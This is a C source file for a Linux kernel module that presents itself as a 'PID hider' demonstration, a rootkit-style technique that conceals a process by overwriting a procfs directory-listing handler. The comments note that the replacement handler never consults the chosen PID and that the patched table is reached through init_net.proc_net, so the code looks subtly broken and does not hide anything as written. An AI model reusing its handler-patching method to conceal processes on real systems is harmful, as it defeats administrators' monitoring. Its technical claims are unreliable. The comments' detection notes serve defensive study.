#include <linux/module.h>
#include <linux/kernel.h>
#include <linux/init.h>
#include <linux/proc_fs.h>
#include <linux/seq_file.h>
#include <linux/sched.h>
#include <linux/sched/task.h>
#include <linux/pid.h>
#include <linux/version.h>
#include <linux/slab.h>
/*
 * Module metadata. The description string states the purpose outright:
 * a demonstration of hiding a process ID from process listings.
 * NOTE(review): no MODULE_LICENSE() declaration is visible in this listing.
 */
MODULE_AUTHOR("Research Only");
MODULE_DESCRIPTION("Process ID hiding demonstration");
MODULE_VERSION("0.1");

/*
 * PID chosen at load time. 0 means "none": pid_hider_init() installs no
 * hook in that case.
 *
 * Mode 0644 publishes the value under /sys/module/<module>/parameters/,
 * readable by every user and writable by root. While the module is loaded
 * the selected PID is therefore itself an observable artifact.
 */
static unsigned int hidden_pid = 0;
module_param(hidden_pid, uint, 0644);
MODULE_PARM_DESC(hidden_pid, "PID to hide from process listing");

/*
 * Handler that occupied the iterate_shared slot before it was replaced.
 * Written by hook_proc_listdir(), read by hider_proc_pid_readdir() and
 * unhook_proc_listdir().
 */
static int (*orig_proc_pid_readdir)(struct file *, struct dir_context *);
/*
 * Replacement iterate_shared handler installed by hook_proc_listdir().
 *
 * As written this is a pass-through. It builds a private dir_context that
 * carries the caller's actor and position, runs the saved original handler
 * on it, copies the resulting position back to the caller's context and
 * returns the original handler's result. hidden_pid is never consulted in
 * this function, so no directory entry is filtered.
 */
static int hider_proc_pid_readdir(struct file *file, struct dir_context *ctx)
{
	struct dir_context shadow = {
		.actor = ctx->actor,
		.pos = ctx->pos,
	};
	int rc;

	rc = orig_proc_pid_readdir(file, &shadow);
	/* Propagate how far the original handler advanced. */
	ctx->pos = shadow.pos;

	return rc;
}
/*
 * Replace the iterate_shared slot of a procfs file_operations table with
 * hider_proc_pid_readdir(), remembering the previous handler first.
 *
 * The table is reached through init_net.proc_net. The original local was
 * named proc_root, but init_net.proc_net is the value it was given. The
 * cast drops whatever qualifier ->proc_fops carries so the slot can be
 * written in place. Neither pointer is checked before it is dereferenced.
 *
 * Detection note: once this has run, the slot no longer holds the handler
 * procfs registered but an address inside this module. Integrity checks on
 * operations tables look for exactly that mismatch.
 *
 * Always returns 0.
 */
static int hook_proc_listdir(void)
{
	struct proc_dir_entry *entry = init_net.proc_net;
	struct file_operations *ops = (struct file_operations *)entry->proc_fops;

	/* Save before overwrite: the saved pointer is the only way back. */
	orig_proc_pid_readdir = ops->iterate_shared;
	ops->iterate_shared = hider_proc_pid_readdir;

	return 0;
}
/*
 * Undo hook_proc_listdir(): put the saved handler back into the
 * iterate_shared slot, but only if the slot still points at
 * hider_proc_pid_readdir(). When the hook was never installed, or the slot
 * has since been changed to something else, the table is left untouched.
 *
 * The table is located the same way as in hook_proc_listdir(), through
 * init_net.proc_net with an unchecked cast of ->proc_fops.
 */
static void unhook_proc_listdir(void)
{
	struct proc_dir_entry *entry = init_net.proc_net;
	struct file_operations *ops = (struct file_operations *)entry->proc_fops;

	if (ops->iterate_shared != hider_proc_pid_readdir)
		return;

	ops->iterate_shared = orig_proc_pid_readdir;
}
/*
 * Module load entry point.
 *
 * Logs that the module is initializing. If the hidden_pid parameter is
 * non-zero it logs the selected PID and calls hook_proc_listdir().
 * Otherwise it logs a warning and installs nothing. The return value of
 * hook_proc_listdir() is not inspected. Always returns 0, so the module
 * stays loaded in both cases.
 *
 * Detection note: every path writes a "PID hider:" line to the kernel log,
 * and the non-zero path includes the PID itself.
 */
static int __init pid_hider_init(void)
{
	pr_info("PID hider: Initializing module\n");

	if (hidden_pid != 0) {
		pr_info("PID hider: Will hide PID %u\n", hidden_pid);
		hook_proc_listdir();
	} else {
		pr_warn("PID hider: No PID specified, module will not hide any process\n");
	}

	return 0;
}
/*
 * Module unload entry point: logs the unload and calls
 * unhook_proc_listdir(). That call restores the saved handler only when
 * the hook is still in place.
 */
static void __exit pid_hider_exit(void)
{
	pr_info("PID hider: Unloading module\n");
	unhook_proc_listdir();
}
/* Register pid_hider_init() and pid_hider_exit() as the load and unload entry points. */
module_init(pid_hider_init);
module_exit(pid_hider_exit);